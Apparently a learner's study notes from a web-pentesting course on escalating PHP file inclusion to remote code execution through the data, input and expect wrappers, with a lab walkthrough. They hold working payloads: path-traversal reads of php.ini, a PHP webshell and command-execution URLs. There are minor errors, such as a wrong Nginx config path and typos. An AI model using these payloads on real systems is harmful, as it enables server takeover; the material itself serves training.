# Intro - In previous sections, we exploited file inclusion vulns to disclose local files - Moving forward we will leverage file inclusion vulns for remote code execution # Data Wrapper - The [data](https://www.php.net/manual/en/wrappers.data.php) wrapper can be used to include external data, including PHP code - But, the data wrapper is only available to use if the (`allow_url_include`) setting is enabled in the PHP configurations - So, we need to first confirm whether this setting is enabled, by reading the PHP configuration file through the LFI vulnerability - Apache location: `/etc/php/X.Y/apache2/php.ini` - where x.y = php version - Nginx location: `/etc/php/X.Y/apache2/php.ini` - Knowing how to check for the `allow_url_include` option can be very important, as this option is not enabled by default - This option being enables is required for several other LFI attacks, like using the `input` wrapper or for any RFI attack - Below we will use `curl` and also leverage the base64 php filter to avoid breaking anything ```bash curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" ``` - Decode and `grep` for the `allow_url_inside` setting ```bash echo '<base64_string?' | base64 -d | grep allow_url_include ``` # Data Wrapper RCE Attack - Base64 encode a basic php webshell ```bash echo '<?php system($_GET["cmd"]); ?>' | base64 ``` - URL encode the base64 string and pass to the data wrapper `data://text/plain;bas64` - Appended to this is a command we are passing to the webshell `&cmd=<COMMAND>` - We can leverage the browser with the following URL ```url http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id ``` ![[images/Pasted image 20251217195907.png]] - Alternatively we can use `curl` ```bash curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid ``` # Input Wrapper RCE Attack - The [input](https://www.php.net/manual/en/wrappers.php.php) wrapper can be used to include external input and execute PHP code - The main difference between the `input` wrapper, as opposed to the `data` wrapper, is that we pass our input to the `input` wrapper as a POST request's data - So, the vulnerable parameter must accept POST requests for this attack to work - Notably, the `input` wrapper also depends on the `allow_url_include` setting - Example using `curl` ```bash curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid ``` # Expect Wrapper RCE Attack - The [expect](https://www.php.net/manual/en/wrappers.expect.php) wrapper allows us to directly run commands through URL streams - Expect works very similarly to the web shells we've used earlier, but don't need to provide a web shell, as it is designed to execute commands - However, expect is an external wrapper, so it needs to be manually installed and enabled on the back-end server, though some web apps rely on it for their core functionality, so we may find it in specific cases - We can determine whether it is installed on the back-end server just like we did with `allow_url_include` earlier, but we'd `grep` for `expect` instead - Pull php config file and check for `expect` setting within base64 string ```bash curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini echo "<base64_string>" | base64 -d | grep expect ``` - Assuming the expect setting is present use the `expect` wrapper using `expect://` followed by the command ```bash curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" ``` # Exercise - Ping test ![[images/Pasted image 20251217201446.png]] - Nmap scan - Apache version is noted here as 2.4![[images/Pasted image 20251217201514.png]] - Visit page ![[images/Pasted image 20251217201500.png]] - Pull php config file ![[images/Pasted image 20251217202228.png]] - Here it's easier to pull the super long base64 string from the browser ![[images/Pasted image 20251217202606.png]] - Decode base64 string and look for `expect` ![[images/Pasted image 20251217202535.png]] - Nothing - This base64 string does not end with a `=` and is hard to work with - Use some `sed` filtering to remove HTML junk - Cleaner but still very long ```bash curl "http://83.136.250.108:33334/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"| grep "W1BI" | sed 's/ \{12\}//g' | sed 's/<p class="read-more">//g' > configBase64.txt ``` - `cat` the new file and `grep` for the `allow_url_include` setting ![[images/Pasted image 20251217203222.png]] - base64 encode the simple php webshell ![[images/Pasted image 20251217203341.png]] - Use the `data` wrapper to pass the base64 encoded php webshell followed by a simple command - Does not work ![[images/Pasted image 20251217203618.png]] - URL encode base64 string including the `+` and the trailing `==` - Now we have working RCE ![[images/Pasted image 20251217203749.png]] - find the flag in the `/` directory - list contents of `/` directory ![[images/Pasted image 20251217204245.png]] - `cat` the unique `txt` file ![[images/Pasted image 20251217204540.png]]